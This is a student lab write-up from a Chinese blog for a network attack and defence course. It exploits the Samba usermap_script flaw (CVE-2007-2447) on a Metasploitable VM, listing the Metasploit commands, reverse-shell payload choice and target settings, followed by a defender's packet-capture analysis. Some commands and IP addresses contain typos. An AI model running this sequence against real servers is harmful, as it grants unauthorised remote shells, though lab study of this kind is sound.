20221910 2022-2023-3 《网络攻防实践》第7周作业

最新推荐文章于 2024-08-12 00:41:54 发布
最新推荐文章于 2024-08-12 00:41:54 发布
阅读量80 收藏
点赞数
文章标签: 网络 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44373690/article/details/130250590
版权

1.实践内容

1.1 实验要求

https://bbs.csdn.net/topics/614753043

1.2 实验原理

1.2.1 Linux系统远程攻防技术

  • 对Linux系统各种网络服务的身份认证过程所涉及的用户口令字进行猜测攻击,期望破解出某一服务真实有效的用户账户和口令,从而假冒该用户的身份进入系统。

  • 挖掘Linux系统某个监听网络服务的安全漏洞并进行利用,在攻击目标服务进程中注入攻击负载模块代码进行执行,从而为攻击者提供本地shell的访问权。

  • 通过网页木马、发送欺诈邮件、提供特洛伊木马程序等技术和社会工程学手段,来攻击客户端程序和用户,由客户端软件或用户来安装和执行恶意程序,从而主动向攻击者打开Linux系统的大门。

  • 在Linux系统作为连接多个网络的路由器,或者打开混杂模式实施网络嗅探的监听器时,可能遭受攻击者特意构造的数据包攻击,从而被攻击者取得访问权。

1.2.2 Samba

Samba是linux和unix系统上实现smb协议的一个免费软件,由客户机和服务器构成。SMB是一种在局域网上实现共享文件和打印机的协议。存在一个服务器,客户机通过该协议可以服务器上的共享文件系统和打印机以及其他的资源。通过设置,还可以和全世界的电脑分享资源。

1.2.3 Username map script

  • Samba协议的一个漏洞CVE-2007-2447,用户名映射脚本命令执行
  • 影响Samba的3.0.20到3.0.25rc3 版本
  • 当使用非默认的用户名映射脚本配置选项时产生
  • 通过指定一个包含shell元字符的用户名,攻击者能够执行任意命令

2.实践过程

2.1 使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击; ⑥查看是否正确得到远程Shell,并查看获得的权限。

  • 选择Kali作为攻击机,查看其IP为:170.20.10.4
    在这里插入图片描述
    选择Metasploit作为靶机,通过sudo vim /etc/rc.local,进行路由设置后,sudo reboot重启
    查看其IP为:170.20.10.7
    在这里插入图片描述
    测试两台虚拟机连通性
    在这里插入图片描述
  • 在Kali中输入msfconsole指令进入操作台
    在这里插入图片描述
    输入命令 search samba 查找漏洞信息
    在这里插入图片描述
    选择第八个攻击脚本进行攻击 use 8(exploit/multi/samba/user),输入 show payloads查看payload类型
    在这里插入图片描述
    通过 set payload cms/unix/reverse选择反向连接
    在这里插入图片描述
    输入命令 set RHOST 172.20.10.7,设置攻击靶机IP,LHOST默认为Kali,设置成功后 run 进行攻击
    在这里插入图片描述
  • 攻击完成后,进入靶机系统,使用 ifconfig 命令查看IP为靶机IP,获取成功。
    之后再进入靶机的 /home/msfadmin目录下,创建名为“20221910”的文件夹,通过ls查看,文件夹创建成功
    在这里插入图片描述

2.2 实践作业:攻防对抗实践

  • 攻击方:使用 Metasploit ,选择 Metasploitable靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
  • 防守方:使用 tcpdump/wireshark/snort监听获得网络攻击的数据包文件,结合 wireshark/snort分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

实验环境
攻击机Kali:172.20.10.4(王沁)
靶机Metasploit:172.20.10.6(张黎仙)

  • 将两台虚拟机网络适配器设置为桥接模式,连入同一网络热点,进行连通性测试
    在这里插入图片描述

  • 攻击机Kali通过msfconsole进入控制器,进行与任务一一样的设置过程,将RHOST设置为靶机IP172.20.10.6后进行攻击
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

  • 攻击完成后,通过ifconfig命令查看IP,为170.20.10.6,攻击成功。
    在这里插入图片描述
    进入靶机系统 /home/msfadmin/目录下,创建名为“20221910”的文件夹,ls查看目录,创建成功
    在这里插入图片描述
    随后进入创建的文件夹中,发现靶机已创建名为“20221902.txt”文档,查看其内容为“Do you want to go for a walk with me on Saturday?”
    在这里插入图片描述
    我的回答当然会是“YES”,并且是“ANYTIME”

  • 查看攻击过程中捕获的数据包,追踪SMB协议数据流,查看到其“no hang up”,就是不挂断的意思,用nohup运行命令可以使命令永久的执行下去。
    在这里插入图片描述
    通过tcp数据流分析,可以看到攻击机执行的命令
    在这里插入图片描述

3.学习中遇到的问题及解决方法

  • 问题1:
    在任务二攻防对抗中,一台主机通过网线连接后开启热点,另一台主机接入后,两台主机可以连通但IP显示不在同一网段中。
  • 问题1解决方案:
    两台主机通过热点连接同一局域网。

4.实践总结

学习了linux远程渗透攻击,对Linux操作系统安全机制等有了进一步了解。

5.参考资料

20221910
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SXU-2022-2023第一学期网络攻防期末考试答案(个人版,99.8分).pdf
12-31
山西大学2022-2023第一学期网络攻防期末考试答案 此答案为本人考试时亲自实操完成,99.8分
SXU-网络攻防2022-2023学年第一学期期末考试题
12-28
山西大学网络攻防2022-2023学年第一学期期末考试题 山西大学网络攻防2022-2023学年第一学期期末考试题 山西大学网络攻防2022-2023学年第一学期期末考试题 山西大学网络攻防2022-2023学年第一学期期末考试题 山西大学...
20221910 2022-2023-3 《网络攻防实践》第9作业
weixin_44373690的博客
05-07 109
缓冲区是内存中存放数据的地方,缓冲区溢出漏洞是指在程序试图将数据放到及其内存中的某一个位置的时候,因为没有足够的空间就会发生缓冲区溢出的现象。
20221910 2022-2023-3 《网络攻防实践》第8作业
weixin_44373690的博客
04-27 117
恶意代码一般指的是对计算机有损害的计算机代码或者web脚本,这些代码或者脚本能使计算机按照攻击者的意图执⾏以达到恶意⽬标。常见的恶意代码包括:病毒(简称病毒)、特洛伊木马(简称木马)、计算机蠕虫(简称蠕虫)、后门、逻辑炸弹等。
20221910 2022-2023-3 《网络攻防实践》第11作业
weixin_44373690的博客
05-20 375
网页木马是对web浏览器软件进行客户端渗透攻击的一类恶意移动代码,通常用脚本语言JavaScript、VBScript实现,或以Flash、PDF等恶意构造的文件形式存在。 - 网页木马攻击是被动式的,需要通过一些技术方法来诱使互联网用户来访问木马页面,与传统的服务器端渗透攻击主动进行网络扫描不同,在获得客户端远程计算机的远程代码执行权限后为进一步主机控制和窃取敏感信息,要植入一些盗号木马类型的恶意程序,因此较传统网页渗透攻击复杂。
20221910 2022-2023-3 《网络攻防实践》第4作业
weixin_44373690的博客
03-23 125
ARP缓存欺骗攻击、ICMP重定向攻击、SYN Flood攻击、TCP RST攻击、TCP会话劫持攻击的原理
20221909 2022-2023-2 《网络攻防实践实践8作业
zxr287的博客
04-26 285
1、这个二进制文件的摘要为caaa6985a43225a0b3add54f44a0d4c7。PE格式:运行在Windows 2000, XP and 2003及以上版的操作系统中,使用了UPX加壳工具进行了加壳处理2、找出并解释这个二进制文件的目的:下载后门到目标主机,发动拒绝服务攻击,可远程与目标主机通信。3、识别并说明这个二进制文件所具有的不同特性:这个恶意程序会自我复制到目标主机c盘,并自动新建文件夹而不被发现,修改注册表,文件运行时自动与其他主机通信。
20222959 2022-2023-2《网络攻防实践》第1作业
qq_44823422的博客
03-06 564
网络攻防实践第一作业
20221902 2022-2023-2 《网络攻防实践》第九次作业
xiannvyeye的博客
05-06 219
objdump -d:对任意一个二进制文件进行反汇编:%!xxd:把二进制文档转成十六进制显示perl -e:指定字符串以作为脚本(多个字符串迭加)执行:管道,把前者的输出作为后者的输入:重定向,将输出内容指向一个指定文件。
20221909 2022-2023-2 《网络攻防实践实践11作业
zxr287的博客
05-17 563
Web浏览器渗透攻击是指通过利用浏览器的漏洞或弱点,向用户的计算机或网络环境中注入恶意代码或获取敏感信息的攻击行为。
20222810 2022-2023-2 《网络攻防实践》第8作业
m0_73792054的博客
05-06 413
本次实践网络攻防实践课程的第八次实践,主要是通过分析工具分析恶意代码,以获取利于我们远离风险的信息。通过本次实践,我学会了如何使用PEiD、IDA等工具,同时对针对一些端口的攻击命令也更敏感了。希望在接下来的大作业中,能将这八次实践的收获学以致用,为今后的进一步学习铺路架桥。
SXU-网络攻防第7次作业-文件上传
12-27
山西大学网络攻防第7次作业——文件上传 自己试一下今天上课讲的五种文件上传方式,文件截断绕过攻击可以不做,把步骤截图保存到文档 1. 文件上传 2. JS检测绕过攻击 3. 文件后缀绕过攻击 4. 文件类型绕过攻击 5. 图...
网络攻防比赛平台源码(AWD-platform源码).7z
06-19
一个awd攻防比赛的裁判平台。 版本:beta v2.0 开发语言:python3 + django 平台分为两个部分 裁判机 靶机 通过特定接口,来实现靶机flag与服务器的通信 搭建流程 裁判机 安装所需环境 裁判机:python3+django ...
SXU-网络攻防作业五-boolean注入
12-27
首先,我们从【标题】和【描述】中了解到这是一项关于网络攻防作业,其目标是实践并理解布尔型注入,通过一系列的输入测试,以确定是否存在注入漏洞,并尝试获取数据库中的信息,而不直接打开S&L(可能指的是SQL的...
如何计算UDP校验和
ZhongUncle的博客
08-07 1019
在了解 UDP 校验和的时候,发现资料很少,如果看教材的话,一定看到过下面这两张图,但是又看不懂,加上解释之后也难懂:本文先说具体怎么算的,再说一些细节,过程中顺带解释一下这两个图(第一张图是布局情况,第二张图是解释如何计算的)。
SSH 和 Telnet 之间的区别
ITmoster的博客
08-08 388
SSH 和 Telnet是帮助用户与远程系统建立连接的两种通信协议,这些通信协议决定了数据如何在网络上的不同设备之间传输,这些设备通常需要通过各种物理和数字环境进行传输,网络协议的主要目标是通信、网络管理和安全。
HAProxy基本配置及参数实操
最新发布
Webston的博客
08-12 865
静态#动态#以下静态和动态取决于hash_type 是否consistentfirst #使用较少static-rr #做了session 共享的web集群leastconn #数据库source#基于客户端公网IP 的会话保持Uri--------------->http #缓存服务器,CDN服务商,蓝汛、百度、阿里云、腾讯url_param--------->http #可以实现session 保持hdr #基于客户端请求报文头部做下一步处理高。
mpls vpn基础实验
wudongfang666的专栏
08-10 479
场景:异地两个站点通过mpls vpn骨干网络实现安全通讯虚拟路由转发 VRF ,相当于在设备内建立一条虚拟通道,一个vpn的实例(vrf)可以简单的理解为一台虚拟设备。拓扑图。
"山西大学网络攻防第六次作业:SQL注入进阶实战练习
SXU-网络攻防第六次作业-sql注入进阶 山西大学网络攻防第六次作业——sql注入进阶 在本次网络攻防作业中,学生们将进行sql注入的进阶练习,包括报错注入、时间注入、堆叠注入以及宽字节注入。这四种注入技术将在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值